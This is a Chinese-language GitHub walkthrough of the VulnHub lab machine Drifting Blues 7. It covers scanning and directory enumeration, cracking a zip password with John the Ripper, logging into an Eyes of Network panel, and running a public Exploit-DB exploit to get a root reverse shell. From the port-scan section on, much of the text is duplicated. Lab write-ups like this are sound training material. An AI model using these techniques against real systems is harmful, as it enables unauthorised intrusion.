Jeet-Bandhara/Vulnhub-Drifting-Blues-7-Walkthrough
GitHub: Jeet-Bandhara/Vulnhub-Drifting-Blues-7-Walkthrough
详细记录了VulnHub靶机Drifting Blues 7的渗透测试全过程,涵盖从信息收集到提权的具体步骤。
Stars: 0 | Forks: 0
# 🔐 Drifting Blues 7 攻略
## 📌 概述
- **靶机:** Drifting Blues 7
- **平台:** VulnHub
- **目标:** 获取 root 权限
🎯 本攻略展示了一种结构化的方法,涵盖了 **信息收集、漏洞利用和权限提升**。
## 🧠 方法论
```
flowchart LR
A[Recon] --> B[Enumeration]
B --> C[Exploitation]
C --> D[Privilege Escalation]
D --> E[Root/User Access]
```
## 🌐 网络发现
我们将首先借助 netdiscover 工具来发现受害者的 IP 地址。
- 命令:sudo netdiscover -r
- 目标 IP:192.168.56.106
## 🔎 端口扫描
一旦我们找到了 IP 地址,现在我们将使用 nmap 扫描此机器上运行的所有开放端口和服务。
- 命令:sudo nmap -Pn -sS
| 端口 | 服务 |
| ---- | ------------- |
| 22 | SSH |
| 80 | HTTP |
| 111 | rpcbind |
| 443 | HTTPS |
| 3306 | mysql |
| 8086 | d-s-n |
## 🧪 枚举
借助 nmap 我发现端口 80 是开放的,运行着 HTTP 服务,因此我们可以去浏览该网页,看看能找到更多信息。
- 端口 80:Eyes of Network 管理员登录面板
- 默认凭据登录失败\
## 📂 目录爆破
现在我将尝试借助 dirbuster 工具进行目录爆破,以发现可能包含某些有用信息的隐藏文件或目录。
- 命令:dirb https:// /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
- 
**发现**
- bash.history
我发现 bash.history 文件包含了先前用户的 shell 命令,因此我们将在攻击机中使用 curl 命令打开它。
- 命令:curl http:///.bash_history
使用 curl 打开 bash.history 后,我发现里面包含一个 flag.txt,其中含有一个 flag。
为了进行进一步的枚举,我使用了 gobuster 工具来查找更多信息。
- 命令:gobuster dir -u https:// -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt
- 发现
- /eon
我发现了另一个目录 /eon,所以我也将使用 curl 打开这个文件
## 🔐 漏洞利用
打开 /eon 后,我发现里面有经过 base64 编码的内容,因此现在我们将借助 base64.guru 对其进行解码。
我发现这是一个 zip 文件,因此我下载了它并尝试解压。但在解压时系统要求输入密码,因此我使用 zip2john 来提取 application.zip 的密码哈希。
**密码破解**
- 命令:zip2john application.zip > hash
john hash --wordlist=/usr/share/wordlists/rockyou.txt
破解后我发现密码是 **killah**
现在我将使用这个密码来解压文件并查看其内容。
解压后,我发现其中包含用户名和密码。
- **用户名:** admin
- **密码:** isitreal31_
我将使用这个用户名和密码登录之前发现的 Eyes of Network 管理员面板。
成功登录 Eyes of Network 控制面板。
**远程代码执行**
在 exploit.db 网站上已经有一个针对 Eyes of Network 的远程代码执行漏洞利用程序,因此我将下载该漏洞利用程序并尝试在这里进行利用。
所以现在我将此漏洞利用程序复制为 exploit.py 并运行这段 Python 代码来利用该机器。
- 命令:cp /usr/share/exploitdb/exploits/php/webapps/48025.txt exploit.py
python3 exploit.py https:// \
-ip \
-port 4444 \
-user admin \
-password isitreal31__
- 获取到反弹 shell
🧑💻 权限提升
我已经拥有 root 权限,因此现在我将查找 root flag 以完成本攻略。
- 命令:cd /root
cat flag.txt
所以我已成功利用并获得了 root 权限,实现了我的目标。
⚔️ MITRE ATT&CK 映射
| 阶段 | 技术 |
| -------------------- | --------------------- |
| 侦察 | 主动扫描 |
| 初始访问 | 有效账户 |
| 执行 | 命令注入 |
| 凭据访问 | 不安全的凭据 |
| 权限提升 | 漏洞利用 |
## 🧠 关键要点
- 深度枚举至关重要
- 隐藏文件可能泄露敏感数据\
- 保护薄弱的压缩包可被利用
- 组合利用漏洞可导致系统被全面攻陷
## 👨💻 作者
Jeet Bandhara
- 目标 IP:192.168.56.106
## 🔎 端口扫描
一旦我们找到了 IP 地址,现在我们将使用 nmap 扫描此机器上运行的所有开放端口和服务。
- 命令:sudo nmap -Pn -sS
| 端口 | 服务 |
| ---- | ------------- |
| 22 | SSH |
| 80 | HTTP |
| 111 | rpcbind |
| 443 | HTTPS |
| 3306 | mysql |
| 8086 | d-s-n |
## 🧪 枚举
借助 nmap 我发现端口 80 是开放的,运行着 HTTP 服务,因此我们可以去浏览该网页,看看能找到更多信息。
- 端口 80:Eyes of Network 管理员登录面板
- 默认凭据登录失败\
## 📂 目录爆破
现在我将尝试借助 dirbuster 工具进行目录爆破,以发现可能包含某些有用信息的隐藏文件或目录。
- 命令:dirb https://
**发现**
- bash.history
我发现 bash.history 文件包含了先前用户的 shell 命令,因此我们将在攻击机中使用 curl 命令打开它。
- 命令:curl http://
使用 curl 打开 bash.history 后,我发现里面包含一个 flag.txt,其中含有一个 flag。
为了进行进一步的枚举,我使用了 gobuster 工具来查找更多信息。
- 命令:gobuster dir -u https://
- 发现
- /eon
我发现了另一个目录 /eon,所以我也将使用 curl 打开这个文件
## 🔐 漏洞利用
我发现这是一个 zip 文件,因此我下载了它并尝试解压。但在解压时系统要求输入密码,因此我使用 zip2john 来提取 application.zip 的密码哈希。
**密码破解**
- 命令:zip2john application.zip > hash
john hash --wordlist=/usr/share/wordlists/rockyou.txt
破解后我发现密码是 **killah**
现在我将使用这个密码来解压文件并查看其内容。
解压后,我发现其中包含用户名和密码。
- **用户名:** admin
- **密码:** isitreal31_
我将使用这个用户名和密码登录之前发现的 Eyes of Network 管理员面板。
成功登录 Eyes of Network 控制面板。
**远程代码执行**
在 exploit.db 网站上已经有一个针对 Eyes of Network 的远程代码执行漏洞利用程序,因此我将下载该漏洞利用程序并尝试在这里进行利用。
所以现在我将此漏洞利用程序复制为 exploit.py 并运行这段 Python 代码来利用该机器。
- 命令:cp /usr/share/exploitdb/exploits/php/webapps/48025.txt exploit.py
python3 exploit.py https://
- 获取到反弹 shell
🧑💻 权限提升
我已经拥有 root 权限,因此现在我将查找 root flag 以完成本攻略。
- 命令:cd /root
cat flag.txt
所以我已成功利用并获得了 root 权限,实现了我的目标。
⚔️ MITRE ATT&CK 映射
| 阶段 | 技术 |
| -------------------- | --------------------- |
| 侦察 | 主动扫描 |
| 初始访问 | 有效账户 |
| 执行 | 命令注入 |
| 凭据访问 | 不安全的凭据 |
| 权限提升 | 漏洞利用 |
## 🧠 关键要点
- 深度枚举至关重要
- 隐藏文件可能泄露敏感数据\
- 保护薄弱的压缩包可被利用
- 组合利用漏洞可导致系统被全面攻陷
## 👨💻 作者
Jeet Bandhara标签:CISA项目, CTI, Dirbuster, Drifting Blues 7, Enumeration, Exploitation, Eyes of Network, Nmap, Privilege Escalation, VulnHub, Web报告查看器, 云存储安全, 协议分析, 威胁模拟, 提权, 插件系统, 数据展示, 数据统计, 权限提升, 渗透测试方法论, 目录爆破, 端口扫描, 红队, 网络安全, 网络安全审计, 网络扫描, 虚拟驱动器, 逆向工具, 隐私保护, 靶机 walkthrough, 靶机实战